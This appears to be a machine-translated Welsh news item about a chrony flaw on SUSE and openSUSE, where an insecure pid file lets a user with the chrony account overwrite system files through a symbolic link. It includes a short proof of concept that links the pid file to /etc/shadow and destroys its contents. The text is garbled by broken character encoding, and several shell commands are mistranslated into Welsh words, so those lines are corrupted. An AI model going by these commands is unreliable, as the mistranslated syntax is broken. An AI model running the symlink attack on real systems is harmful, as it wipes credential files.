Π
Mae'r bregusrwydd yn cael ei achosi gan greu ffeil pid anniogel, a grΓ«wyd ar adeg pan nad oedd chrony wedi ailosod breintiau eto ac roedd yn rhedeg fel gwraidd. Yn yr achos hwn, crΓ«wyd y cyfeiriadur / run / chrony, lle mae'r ffeil pid wedi'i ysgrifennu, gyda hawliau 0750 trwy systemd-tmpfiles neu pan lansiwyd chronyd mewn cydweithrediad Γ’'r defnyddiwr a'r grΕ΅p βchronyβ. Felly, os oes gennych fynediad i'r crony defnyddiwr, mae'n bosibl disodli'r ffeil pid /run/chrony/chronyd.pid gyda dolen symbolaidd. Gall dolen symbolaidd bwyntio at unrhyw ffeil system a fydd yn cael ei throsysgrifo pan fydd cronyd yn cael ei lansio.
gwraidd# systemctl stopio chronyd.service
gwraidd # sudo -u chrony /bin/bash
chroni$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ allanfa
gwraidd # /usr/sbin/chronyd -n
^C
# yn lle cynnwys /etc/shadow bydd ID proses chronyd yn cael ei gadw
gwraidd# cath /etc/cysgod
15287
Bregusrwydd
Suse ac openSUSE problem
Ffynhonnell: opennet.ru